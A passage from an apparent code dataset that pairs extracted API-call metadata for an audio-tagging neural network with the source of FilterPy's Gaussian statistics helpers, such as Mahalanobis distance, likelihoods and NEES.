"torch.nn.BatchNorm1d",
"librosa.util.pad_center",
"torch.nn.functional.avg_pool1d",
"torch.sum",
"torch.nn.functional.pad",
"torch.isinf",
"numpy.imag",
"numpy.arange",
"torch.nn.BatchNorm2d",
"torch.nn.init.xavier_uniform_",
"torch.mean",
"torch.nn.functional.avg_pool2d",
"numpy.exp",
"t... | [((9567, 9604), 'torch.nn.init.xavier_uniform_', 'nn.init.xavier_uniform_', (['layer.weight'], {}), '(layer.weight)\n', (9590, 9604), True, 'import torch.nn as nn\n'), ((11300, 11341), 'torch.cat', 'torch.cat', (['(framewise_output, pad)'], {'dim': '(1)'}), '((framewise_output, pad), dim=1)\n', (11309, 11341), False, 'import torch\n'), ((911, 940), 'numpy.exp', 'np.exp', (['(-2 * np.pi * 1.0j / n)'], {}), '(-2 * np.pi * 1.0j / n)\n', (917, 940), True, 'import numpy as np\n'), ((951, 973), 'numpy.power', 'np.power', (['omega', '(x * y)'], {}), '(omega, x * y)\n', (959, 973), True, 'import numpy as np\n'), ((1095, 1123), 'numpy.exp', 'np.exp', (['(2 * np.pi * 1.0j / n)'], {}), '(2 * np.pi * 1.0j / n)\n', (1101, 1123), True, 'import numpy as np\n'), ((1134, 1156), 'numpy.power', 'np.power', (['omega', '(x * y)'], {}), '(omega, x * y)\n', (1142, 1156), True, 'import numpy as np\n'), ((1977, 2037), 'librosa.filters.get_window', 'librosa.filters.get_window', (['window', 'win_length'], {'fftbins': '(True)'}), '(window, win_length, fftbins=True)\n', (2003, 2037), False, 'import librosa\n'), ((2103, 2145), 'librosa.util.pad_center', 'librosa.util.pad_center', (['fft_window', 'n_fft'], {}), '(fft_window, n_fft)\n', (2126, 2145), False, 'import librosa\n'), ((2280, 2418), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': '(1)', 'out_channels': 'out_channels', 'kernel_size': 'n_fft', 'stride': 'hop_length', 'padding': '(0)', 'dilation': '(1)', 'groups': '(1)', 'bias': '(False)'}), '(in_channels=1, out_channels=out_channels, kernel_size=n_fft,\n stride=hop_length, padding=0, dilation=1, groups=1, bias=False)\n', (2289, 2418), True, 'import torch.nn as nn\n'), ((2548, 2686), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': '(1)', 'out_channels': 'out_channels', 'kernel_size': 'n_fft', 'stride': 'hop_length', 'padding': '(0)', 'dilation': '(1)', 'groups': '(1)', 'bias': '(False)'}), '(in_channels=1, out_channels=out_channels, kernel_size=n_fft,\n stride=hop_length, 
padding=0, dilation=1, groups=1, bias=False)\n', (2557, 2686), True, 'import torch.nn as nn\n'), ((6330, 6360), 'torch.matmul', 'torch.matmul', (['input', 'self.melW'], {}), '(input, self.melW)\n', (6342, 6360), False, 'import torch\n'), ((11549, 11678), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'in_channels', 'out_channels': 'out_channels', 'kernel_size': '(3, 3)', 'stride': '(1, 1)', 'padding': '(1, 1)', 'bias': '(False)'}), '(in_channels=in_channels, out_channels=out_channels, kernel_size=(\n 3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n', (11558, 11678), True, 'import torch.nn as nn\n'), ((11779, 11909), 'torch.nn.Conv2d', 'nn.Conv2d', ([], {'in_channels': 'out_channels', 'out_channels': 'out_channels', 'kernel_size': '(3, 3)', 'stride': '(1, 1)', 'padding': '(1, 1)', 'bias': '(False)'}), '(in_channels=out_channels, out_channels=out_channels, kernel_size=\n (3, 3), stride=(1, 1), padding=(1, 1), bias=False)\n', (11788, 11909), True, 'import torch.nn as nn\n'), ((12008, 12036), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (12022, 12036), True, 'import torch.nn as nn\n'), ((12056, 12084), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['out_channels'], {}), '(out_channels)\n', (12070, 12084), True, 'import torch.nn as nn\n'), ((13125, 13237), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': 'in_features', 'out_channels': 'out_features', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channels=in_features, out_channels=out_features, kernel_size=1,\n stride=1, padding=0, bias=True)\n', (13134, 13237), True, 'import torch.nn as nn\n'), ((13336, 13448), 'torch.nn.Conv1d', 'nn.Conv1d', ([], {'in_channels': 'in_features', 'out_channels': 'out_features', 'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)', 'bias': '(True)'}), '(in_channels=in_features, out_channels=out_features, kernel_size=1,\n stride=1, padding=0, bias=True)\n', (13345, 13448), True, 'import torch.nn as 
nn\n'), ((13551, 13579), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', (['out_features'], {}), '(out_features)\n', (13565, 13579), True, 'import torch.nn as nn\n'), ((13930, 13962), 'torch.sum', 'torch.sum', (['(norm_att * cla)'], {'dim': '(2)'}), '(norm_att * cla, dim=2)\n', (13939, 13962), False, 'import torch\n'), ((15512, 15536), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['mel_bins'], {}), '(mel_bins)\n', (15526, 15536), True, 'import torch.nn as nn\n'), ((15989, 16021), 'torch.nn.Linear', 'nn.Linear', (['(2048)', '(2048)'], {'bias': '(True)'}), '(2048, 2048, bias=True)\n', (15998, 16021), True, 'import torch.nn as nn\n'), ((16328, 16371), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16337, 16371), True, 'import torch.nn.functional as F\n'), ((16451, 16494), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16460, 16494), True, 'import torch.nn.functional as F\n'), ((16574, 16617), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16583, 16617), True, 'import torch.nn.functional as F\n'), ((16697, 16740), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16706, 16740), True, 'import torch.nn.functional as F\n'), ((16820, 16863), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16829, 16863), True, 'import torch.nn.functional as F\n'), ((16943, 16986), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.2)', 'training': 'self.training'}), '(x, p=0.2, training=self.training)\n', (16952, 16986), True, 'import torch.nn.functional as F\n'), ((17929, 17949), 'torch.mean', 'torch.mean', (['x'], {'dim': '(3)'}), '(x, 
dim=3)\n', (17939, 17949), False, 'import torch\n'), ((17964, 18015), 'torch.nn.functional.max_pool1d', 'F.max_pool1d', (['x'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(x, kernel_size=3, stride=1, padding=1)\n', (17976, 18015), True, 'import torch.nn.functional as F\n'), ((18029, 18080), 'torch.nn.functional.avg_pool1d', 'F.avg_pool1d', (['x'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(x, kernel_size=3, stride=1, padding=1)\n', (18041, 18080), True, 'import torch.nn.functional as F\n'), ((18114, 18157), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.5)', 'training': 'self.training'}), '(x, p=0.5, training=self.training)\n', (18123, 18157), True, 'import torch.nn.functional as F\n'), ((18263, 18306), 'torch.nn.functional.dropout', 'F.dropout', (['x'], {'p': '(0.5)', 'training': 'self.training'}), '(x, p=0.5, training=self.training)\n', (18272, 18306), True, 'import torch.nn.functional as F\n'), ((20015, 20032), 'numpy.load', 'np.load', (['wav_path'], {}), '(wav_path)\n', (20022, 20032), True, 'import numpy as np\n'), ((20992, 21004), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (21002, 21004), True, 'import torch.nn as nn\n'), ((22297, 22338), 'sklearn.metrics.f1_score', 'f1_score', (['y_true', 'y_pred'], {'average': '"""macro"""'}), "(y_true, y_pred, average='macro')\n", (22305, 22338), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((22588, 22629), 'sklearn.metrics.f1_score', 'f1_score', (['y_true', 'y_pred'], {'average': '"""macro"""'}), "(y_true, y_pred, average='macro')\n", (22596, 22629), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((23768, 23828), 'sklearn.metrics.average_precision_score', 'average_precision_score', (['targ', 'clipwise_output'], {'average': 'None'}), '(targ, clipwise_output, average=None)\n', (23791, 23828), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((23983, 24022), 'numpy.concatenate', 
'np.concatenate', (['self.prediction'], {'axis': '(0)'}), '(self.prediction, axis=0)\n', (23997, 24022), True, 'import numpy as np\n'), ((24040, 24075), 'numpy.concatenate', 'np.concatenate', (['self.target'], {'axis': '(0)'}), '(self.target, axis=0)\n', (24054, 24075), True, 'import numpy as np\n'), ((24092, 24145), 'sklearn.metrics.average_precision_score', 'average_precision_score', (['y_true', 'y_pred'], {'average': 'None'}), '(y_true, y_pred, average=None)\n', (24115, 24145), False, 'from sklearn.metrics import average_precision_score, f1_score\n'), ((24636, 24660), 'torch.load', 'torch.load', (['weights_path'], {}), '(weights_path)\n', (24646, 24660), False, 'import torch\n'), ((24738, 24751), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (24749, 24751), False, 'from collections import OrderedDict\n'), ((867, 879), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (876, 879), True, 'import numpy as np\n'), ((881, 893), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (890, 893), True, 'import numpy as np\n'), ((1051, 1063), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (1060, 1063), True, 'import numpy as np\n'), ((1065, 1077), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (1074, 1077), True, 'import numpy as np\n'), ((3606, 3674), 'torch.nn.functional.pad', 'F.pad', (['x'], {'pad': '(self.n_fft // 2, self.n_fft // 2)', 'mode': 'self.pad_mode'}), '(x, pad=(self.n_fft // 2, self.n_fft // 2), mode=self.pad_mode)\n', (3611, 3674), True, 'import torch.nn.functional as F\n'), ((5813, 5889), 'librosa.filters.mel', 'librosa.filters.mel', ([], {'sr': 'sr', 'n_fft': 'n_fft', 'n_mels': 'n_mels', 'fmin': 'fmin', 'fmax': 'fmax'}), '(sr=sr, n_fft=n_fft, n_mels=n_mels, fmin=fmin, fmax=fmax)\n', (5832, 5889), False, 'import librosa\n'), ((5985, 6008), 'torch.Tensor', 'torch.Tensor', (['self.melW'], {}), '(self.melW)\n', (5997, 6008), False, 'import torch\n'), ((12477, 12515), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], 
{'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12489, 12515), True, 'import torch.nn.functional as F\n'), ((21115, 21134), 'torch.isnan', 'torch.isnan', (['input_'], {}), '(input_)\n', (21126, 21134), False, 'import torch\n'), ((21136, 21160), 'torch.zeros_like', 'torch.zeros_like', (['input_'], {}), '(input_)\n', (21152, 21160), False, 'import torch\n'), ((21199, 21218), 'torch.isinf', 'torch.isinf', (['input_'], {}), '(input_)\n', (21210, 21218), False, 'import torch\n'), ((21220, 21244), 'torch.zeros_like', 'torch.zeros_like', (['input_'], {}), '(input_)\n', (21236, 21244), False, 'import torch\n'), ((6762, 6807), 'torch.clamp', 'torch.clamp', (['input'], {'min': 'self.amin', 'max': 'np.inf'}), '(input, min=self.amin, max=np.inf)\n', (6773, 6807), False, 'import torch\n'), ((6845, 6877), 'numpy.maximum', 'np.maximum', (['self.amin', 'ref_value'], {}), '(self.amin, ref_value)\n', (6855, 6877), True, 'import numpy as np\n'), ((8270, 8323), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': 'self.drop_width', 'size': '(1,)'}), '(low=0, high=self.drop_width, size=(1,))\n', (8283, 8323), False, 'import torch\n'), ((8345, 8405), 'torch.randint', 'torch.randint', ([], {'low': '(0)', 'high': '(total_width - distance)', 'size': '(1,)'}), '(low=0, high=total_width - distance, size=(1,))\n', (8358, 8405), False, 'import torch\n'), ((12565, 12603), 'torch.nn.functional.avg_pool2d', 'F.avg_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12577, 12603), True, 'import torch.nn.functional as F\n'), ((14157, 14173), 'torch.sigmoid', 'torch.sigmoid', (['x'], {}), '(x)\n', (14170, 14173), False, 'import torch\n'), ((20283, 20324), 'numpy.zeros', 'np.zeros', (['effective_length'], {'dtype': 'y.dtype'}), '(effective_length, dtype=y.dtype)\n', (20291, 20324), True, 'import numpy as np\n'), ((20349, 20392), 'numpy.random.randint', 'np.random.randint', (['(effective_length - len_y)'], {}), '(effective_length - len_y)\n', 
(20366, 20392), True, 'import numpy as np\n'), ((22449, 22488), 'numpy.concatenate', 'np.concatenate', (['self.prediction'], {'axis': '(0)'}), '(self.prediction, axis=0)\n', (22463, 22488), True, 'import numpy as np\n'), ((22521, 22556), 'numpy.concatenate', 'np.concatenate', (['self.target'], {'axis': '(0)'}), '(self.target, axis=0)\n', (22535, 22556), True, 'import numpy as np\n'), ((23845, 23865), 'numpy.nan_to_num', 'np.nan_to_num', (['score'], {}), '(score)\n', (23858, 23865), True, 'import numpy as np\n'), ((24162, 24182), 'numpy.nan_to_num', 'np.nan_to_num', (['score'], {}), '(score)\n', (24175, 24182), True, 'import numpy as np\n'), ((2854, 2910), 'numpy.real', 'np.real', (['(self.W[:, 0:out_channels] * fft_window[:, None])'], {}), '(self.W[:, 0:out_channels] * fft_window[:, None])\n', (2861, 2910), True, 'import numpy as np\n'), ((3036, 3092), 'numpy.imag', 'np.imag', (['(self.W[:, 0:out_channels] * fft_window[:, None])'], {}), '(self.W[:, 0:out_channels] * fft_window[:, None])\n', (3043, 3092), True, 'import numpy as np\n'), ((12658, 12696), 'torch.nn.functional.avg_pool2d', 'F.avg_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12670, 12696), True, 'import torch.nn.functional as F\n'), ((12714, 12752), 'torch.nn.functional.max_pool2d', 'F.max_pool2d', (['x'], {'kernel_size': 'pool_size'}), '(x, kernel_size=pool_size)\n', (12726, 12752), True, 'import torch.nn.functional as F\n'), ((20554, 20597), 'numpy.random.randint', 'np.random.randint', (['(len_y - effective_length)'], {}), '(len_y - effective_length)\n', (20571, 20597), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name, too-many-arguments, bad-whitespace
# pylint: disable=too-many-lines, too-many-locals, len-as-condition
# pylint: disable=import-outside-toplevel
"""Copyright 2015 <NAME>.
FilterPy library.
http://github.com/rlabbe/filterpy
Documentation at:
https://filterpy.readthedocs.org
Supporting book at:
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the readme.MD file
for more information.
"""
from __future__ import absolute_import, division, unicode_literals
import math
from math import cos, sin
import random
import warnings
import numpy as np
from numpy.linalg import inv
import scipy.linalg as linalg
import scipy.sparse as sp
import scipy.sparse.linalg as spln
from scipy.stats import norm, multivariate_normal
# Older versions of scipy do not support the allow_singular keyword. I could
# check the version number explicitly, but perhaps this is clearer.
# Probe once at import time: call logpdf with the keyword and record whether
# this SciPy build (>= 0.15.0) accepts it; logpdf() below branches on this.
_support_singular = True
try:
    multivariate_normal.logpdf(1, 1, 1, allow_singular=True)
except TypeError:
    warnings.warn(
        'You are using a version of SciPy that does not support the '\
        'allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). '\
        'Future versions of FilterPy will require a version of SciPy that '\
        'implements this keyword',
        DeprecationWarning)
    _support_singular = False
def _validate_vector(u, dtype=None):
# this is taken from scipy.spatial.distance. Internal function, so
# redefining here.
u = np.asarray(u, dtype=dtype).squeeze()
# Ensure values such as u=1 and u=[1] still return 1-D arrays.
u = np.atleast_1d(u)
if u.ndim > 1:
raise ValueError("Input vector should be 1-D.")
return u
def mahalanobis(x, mean, cov):
    """
    Mahalanobis distance of state vector *x* from the Gaussian `mean` with
    covariance `cov`. Interpretable as the number of standard deviations
    separating x from the mean: a result of 3 means x is 3 std away.

    Parameters
    ----------
    x : (N,) array_like, or float
        Input state vector

    mean : (N,) array_like, or float
        mean of multivariate Gaussian

    cov : (N, N) array_like or float
        covariance of the multivariate Gaussian

    Returns
    -------
    mahalanobis : double
        The Mahalanobis distance between vectors `x` and `mean`

    Examples
    --------
    >>> mahalanobis(x=3., mean=3.5, cov=4.**2)  # univariate case
    0.125

    >>> mahalanobis(x=3., mean=6, cov=1)  # univariate, 3 std away
    3.0

    >>> mahalanobis([1., 2], [1.1, 3.5], [[1., .1],[.1, 13]])
    0.42533327058913922
    """
    u = _validate_vector(x)
    center = _validate_vector(mean)
    if u.shape != center.shape:
        raise ValueError("length of input vectors must be the same")

    residual = u - center
    S = np.atleast_2d(cov)
    # quadratic form residual' S^-1 residual, then the square root
    squared = float(np.dot(np.dot(residual.T, inv(S)), residual))
    return math.sqrt(squared)
def log_likelihood(z, x, P, H, R):
    """
    Log-likelihood of measurement *z* given the Gaussian posterior (x, P),
    using measurement function H and measurement covariance error R.
    """
    # innovation covariance S = H P H' + R
    S = np.dot(H, np.dot(P, H.T)) + R
    z_pred = np.dot(H, x)
    return logpdf(z, z_pred, S)
def likelihood(z, x, P, H, R):
    """
    Likelihood (not log) of measurement *z* given the Gaussian posterior
    (x, P), using measurement function H and measurement covariance error R.
    """
    log_l = log_likelihood(z, x, P, H, R)
    return np.exp(log_l)
def logpdf(x, mean=None, cov=1, allow_singular=True):
    """
    Log of the probability density function of the normal N(mean, cov)
    evaluated at *x*. The normal may be univariate or multivariate.

    Wraps scipy.stats.multivariate_normal.logpdf so that SciPy releases
    older than 0.15.0 — which lack the `allow_singular` keyword — still
    work. On those old versions a singular or non-PSD cov may raise.

    `x` and `mean` may be column vectors, row vectors, or lists.
    """
    flat_x = np.asarray(x).flatten()
    flat_mean = None if mean is None else np.asarray(mean).flatten()

    # _support_singular is probed once at import time
    if not _support_singular:
        return multivariate_normal.logpdf(flat_x, flat_mean, cov)
    return multivariate_normal.logpdf(flat_x, flat_mean, cov, allow_singular)
def gaussian(x, mean, var, normed=True):
    """
    Probability density of the Gaussian (mean, var) evaluated at *x*.
    `mean` and `var` are scalars; *x* may be a scalar or array-like.

    gaussian(1,2,3) is equivalent to scipy.stats.norm(2, math.sqrt(3)).pdf(1)
    but quite a bit faster, albeit much less flexible.

    Parameters
    ----------
    x : scalar or array-like
        The value(s) for which we compute the distribution

    mean : scalar
        Mean of the Gaussian

    var : scalar
        Variance of the Gaussian

    normed : bool, default True
        If *x* is an array, divide the result by its sum so it totals 1.

    Returns
    -------
    pdf : float
        probability distribution of x for the Gaussian (mean, var).
        E.g. 0.101 denotes 10.1%.

    Examples
    --------
    >>> gaussian(8, 1, 2)
    1.3498566943461957e-06

    >>> gaussian([8, 7, 9], 1, 2)
    array([1.34985669e-06, 3.48132630e-05, 3.17455867e-08])
    """
    norm_const = (2 * math.pi * var) ** -.5
    residual = np.asarray(x) - mean
    pdf = norm_const * np.exp(-0.5 * residual**2. / var)
    # only arrays are normalized; a scalar pdf has an empty shape
    if normed and len(np.shape(pdf)) > 0:
        pdf = pdf / sum(pdf)
    return pdf
def mul(mean1, var1, mean2, var2):
    """
    Multiply the Gaussians (mean1, var1) and (mean2, var2), returning the
    result as the tuple (mean, var).

    Strictly speaking the product of two Gaussian PDFs is a Gaussian
    *function*, not a Gaussian PDF. It is, however, proportional to one,
    so it is safe to treat the output as a PDF in any filter that applies
    Bayes equation, which renormalizes the result anyway.

    Parameters
    ----------
    mean1 : scalar
         mean of first Gaussian

    var1 : scalar
         variance of first Gaussian

    mean2 : scalar
         mean of second Gaussian

    var2 : scalar
         variance of second Gaussian

    Returns
    -------
    mean : scalar
        mean of product

    var : scalar
        variance of product

    Examples
    --------
    >>> mul(1, 2, 3, 4)
    (1.6666666666666667, 1.3333333333333333)

    References
    ----------
    Bromily. "Products and Convolutions of Gaussian Probability Functions",
    Tina Memo No. 2003-003.
    http://www.tina-vision.net/docs/memos/2003-003.pdf
    """
    # precision-weighted mean; variances combine harmonically
    product_mean = (var1*mean2 + var2*mean1) / (var1 + var2)
    product_var = 1 / (1/var1 + 1/var2)
    return (product_mean, product_var)
def mul_pdf(mean1, var1, mean2, var2):
    """
    Multiply the Gaussians (mean1, var1) and (mean2, var2), returning the
    result as the tuple (mean, var, scale_factor).

    The product of two Gaussian PDFs is a Gaussian *function*, not a
    Gaussian PDF; it is proportional to one, and `scale_factor` is that
    proportionality constant.

    Parameters
    ----------
    mean1 : scalar
         mean of first Gaussian

    var1 : scalar
         variance of first Gaussian

    mean2 : scalar
         mean of second Gaussian

    var2 : scalar
         variance of second Gaussian

    Returns
    -------
    mean : scalar
        mean of product

    var : scalar
        variance of product

    scale_factor : scalar
        proportionality constant

    Examples
    --------
    >>> mul(1, 2, 3, 4)
    (1.6666666666666667, 1.3333333333333333)

    References
    ----------
    Bromily. "Products and Convolutions of Gaussian Probability Functions",
    Tina Memo No. 2003-003.
    http://www.tina-vision.net/docs/memos/2003-003.pdf
    """
    sum_var = var1 + var2
    product_mean = (var1*mean2 + var2*mean1) / sum_var
    product_var = 1. / (1./var1 + 1./var2)
    # the scale is N(mean1; mean2, var1 + var2)
    scale = math.exp(-(mean1 - mean2)**2 / (2*sum_var)) / \
            math.sqrt(2 * math.pi * sum_var)
    return product_mean, product_var, scale
def add(mean1, var1, mean2, var2):
    """
    Add the Gaussians (mean1, var1) and (mean2, var2) and return the
    result as the tuple (mean, var).

    The sum of two independent Gaussians has mean equal to the sum of the
    means and variance equal to the sum of the variances (sigma squared in
    the usual parlance).
    """
    return (mean1 + mean2, var1 + var2)
def multivariate_gaussian(x, mu, cov):
    """
    Deprecated pdf of a (possibly multivariate) Gaussian evaluated at *x*.

    This was designed to replace scipy.stats.multivariate_normal, which
    first appeared in SciPy 0.14. You may either pass in multivariate data:

    .. code-block:: Python

       multivariate_gaussian (array([1,1]), array([3,4]), eye(2)*1.4)
       multivariate_gaussian (array([1,1,1]), array([3,4,5]), 1.4)

    or unidimensional data:

    .. code-block:: Python

       multivariate_gaussian(1, 3, 1.4)

    In the multivariate case a scalar cov is interpreted as eye(n)*cov.
    For the 1D (univariate) case prefer gaussian(), which is much faster.

    equivalent calls:

    .. code-block:: Python

      multivariate_gaussian(1, 2, 3)
      scipy.stats.multivariate_normal(2,3).pdf(1)

    Parameters
    ----------
    x : float, or np.array-like
       Value to compute the probability for. May be a scalar if univariate,
       or any type convertible to an np.array (list, tuple, etc).

    mu : float, or np.array-like
       Mean of the Gaussian. Same conventions as `x`.

    cov : float, or np.array-like
       Covariance of the Gaussian. Same conventions as `x`.

    Returns
    -------
    probability : float
        probability for x for the Gaussian (mu,cov)
    """
    warnings.warn(
        ("This was implemented before SciPy version 0.14, which implemented "
         "scipy.stats.multivariate_normal. This function will be removed in "
         "a future release of FilterPy"), DeprecationWarning)

    # flatten everything so scalars and row/column vectors share one path
    x = np.array(x, copy=False, ndmin=1).flatten()
    mu = np.array(mu, copy=False, ndmin=1).flatten()

    nx = len(mu)
    cov = _to_cov(cov, nx)

    residual = x - mu
    # quadratic form residual' C^-1 residual via a solve rather than an
    # explicit inverse; sparse covariances get the sparse solver
    if sp.issparse(cov):
        quad_form = spln.spsolve(cov, residual).T.dot(residual)
    else:
        quad_form = np.linalg.solve(cov, residual).T.dot(residual)

    log_norm = nx*math.log(2*math.pi) + np.linalg.slogdet(cov)[1]
    return math.exp(-0.5*(log_norm + quad_form))
def multivariate_multiply(m1, c1, m2, c2):
    """
    Multiply two multivariate Gaussians together and return the result as
    the tuple (mean, covariance).

    Examples
    --------
    .. code-block:: Python

        m, c = multivariate_multiply([7.0, 2], [[1.0, 2.0], [2.0, 1.0]],
                                     [3.2, 0], [[8.0, 1.1], [1.1,8.0]])

    Parameters
    ----------
    m1 : array-like
        Mean of first Gaussian. Anything accepted by numpy.asarray():
        6, [6], [6, 5], np.array([3, 4, 5, 6]) are all valid.

    c1 : matrix-like
        Covariance of first Gaussian. Must be convertable to a 2D array
        via numpy.asarray().

    m2 : array-like
        Mean of second Gaussian; same conventions as `m1`.

    c2 : matrix-like
        Covariance of second Gaussian; same conventions as `c1`.

    Returns
    -------
    m : ndarray
        mean of the result

    c : ndarray
        covariance of the result
    """
    cov1 = np.asarray(c1)
    cov2 = np.asarray(c2)
    mean1 = np.asarray(m1)
    mean2 = np.asarray(m2)

    # K = inv(C1 + C2) appears in both the mean and covariance updates
    K = np.linalg.inv(cov1 + cov2)
    C3 = np.dot(cov1, K).dot(cov2)
    M3 = np.dot(cov2, K).dot(mean1) + np.dot(cov1, K).dot(mean2)
    return M3, C3
def covariance_ellipse(P, deviations=1):
    """
    Return the ellipse describing the 2 dimensional covariance matrix P,
    as the tuple (angle_radians, width_radius, height_radius).

    Parameters
    ----------
    P : nd.array shape (2,2)
       covariance matrix

    deviations : int (optional, default = 1)
       # of standard deviations the ellipse spans. Default is 1.

    Returns (angle_radians, width_radius, height_radius)
    """
    U, s, _ = linalg.svd(P)
    angle = math.atan2(U[1, 0], U[0, 0])
    # SVD yields singular values in descending order, so the first drives
    # the major (width) axis; the check below is a sanity assertion.
    half_axes = [deviations * math.sqrt(sv) for sv in s[:2]]
    width, height = half_axes

    if height > width:
        raise ValueError('width must be greater than height')
    return (angle, width, height)
def _eigsorted(cov, asc=True):
"""
Computes eigenvalues and eigenvectors of a covariance matrix and returns
them sorted by eigenvalue.
Parameters
----------
cov : ndarray
covariance matrix
asc : bool, default=True
determines whether we are sorted smallest to largest (asc=True),
or largest to smallest (asc=False)
Returns
-------
eigval : 1D ndarray
eigenvalues of covariance ordered largest to smallest
eigvec : 2D ndarray
eigenvectors of covariance matrix ordered to match `eigval` ordering.
I.e eigvec[:, 0] is the rotation vector for eigval[0]
"""
eigval, eigvec = np.linalg.eigh(cov)
order = eigval.argsort()
if not asc:
# sort largest to smallest
order = order[::-1]
return eigval[order], eigvec[:, order]
def _std_tuple_of(var=None, std=None, interval=None):
"""
Convienence function for plotting. Given one of var, standard
deviation, or interval, return the std. Any of the three can be an
iterable list.
Examples
--------
>>>_std_tuple_of(var=[1, 3, 9])
(1, 2, 3)
"""
if std is not None:
if np.isscalar(std):
std = (std,)
return std
if interval is not None:
if np.isscalar(interval):
interval = (interval,)
return norm.interval(interval)[1]
if var is None:
raise ValueError("no inputs were provided")
if np.isscalar(var):
var = (var,)
return np.sqrt(var)
def norm_cdf(x_range, mu, var=1, std=None):
    """
    Computes the probability that a Gaussian distribution lies within a
    range of values.

    Parameters
    ----------
    x_range : (float, float)
        tuple of range to compute probability for (order does not matter)

    mu : float
        mean of the Gaussian

    var : float, optional
        variance of the Gaussian. Ignored if `std` is provided

    std : float, optional
        standard deviation of the Gaussian. This overrides the `var`
        parameter

    Returns
    -------
    probability : float
        probability that Gaussian is within x_range. E.g. .1 means 10%.
    """
    sigma = math.sqrt(var) if std is None else std
    lower, upper = x_range
    # abs() makes the result independent of endpoint ordering
    return abs(norm.cdf(lower, loc=mu, scale=sigma) -
               norm.cdf(upper, loc=mu, scale=sigma))
def _to_cov(x, n):
"""
If x is a scalar, returns a covariance matrix generated from it
as the identity matrix multiplied by x. The dimension will be nxn.
If x is already a 2D numpy array then it is returned unchanged.
Raises ValueError if not positive definite
"""
if np.isscalar(x):
if x < 0:
raise ValueError('covariance must be > 0')
return np.eye(n) * x
x = np.atleast_2d(x)
try:
# quickly find out if we are positive definite
np.linalg.cholesky(x)
except:
raise ValueError('covariance must be positive definit')
return x
def rand_student_t(df, mu=0, std=1):
    """
    Return a random number distributed by Student's t distribution with
    `df` degrees of freedom, with the specified mean and scale.

    Uses the standard construction t = Z / sqrt(V / df), where Z is a
    normal draw (scaled by `std`) and V is chi-square with `df` degrees
    of freedom.
    """
    x = random.gauss(0, std)
    # chi-square(df) is Gamma(shape=df/2, scale=2). The previous code
    # multiplied this draw by 2.0, inflating V and shrinking the output's
    # spread by a factor of sqrt(2) relative to a true Student's t.
    y = random.gammavariate(0.5 * df, 2.0)
    return x / math.sqrt(y / df) + mu
def NEES(xs, est_xs, ps):
    """
    Computes the normalized estimated error squared (NEES) test on a
    sequence of estimates. The estimates are optimal if the mean error is
    zero and the covariance matches the Kalman filter's covariance; then
    the mean of the NEES is at most the dimension of x.

    Examples
    --------

    .. code-block: Python

        xs = ground_truth()
        est_xs, ps, _, _ = kf.batch_filter(zs)
        NEES(xs, est_xs, ps)

    Parameters
    ----------
    xs : list-like
        sequence of true values for the state x

    est_xs : list-like
        sequence of estimates from an estimator (such as Kalman filter)

    ps : list-like
        sequence of covariance matrices from the estimator

    Returns
    -------
    errs : list of floats
       list of NEES computed for each estimate
    """
    residuals = xs - est_xs
    # quadratic form r' P^-1 r for each (residual, covariance) pair
    return [np.dot(np.dot(r.T, linalg.inv(p)), r)
            for r, p in zip(residuals, ps)]
| [
"numpy.sqrt",
"math.sqrt",
"math.log",
"numpy.array",
"math.exp",
"scipy.stats.norm.cdf",
"numpy.atleast_2d",
"numpy.isscalar",
"random.gammavariate",
"numpy.asarray",
"scipy.stats.norm.interval",
"numpy.dot",
"numpy.linalg.eigh",
"warnings.warn",
"scipy.sparse.linalg.spsolve",
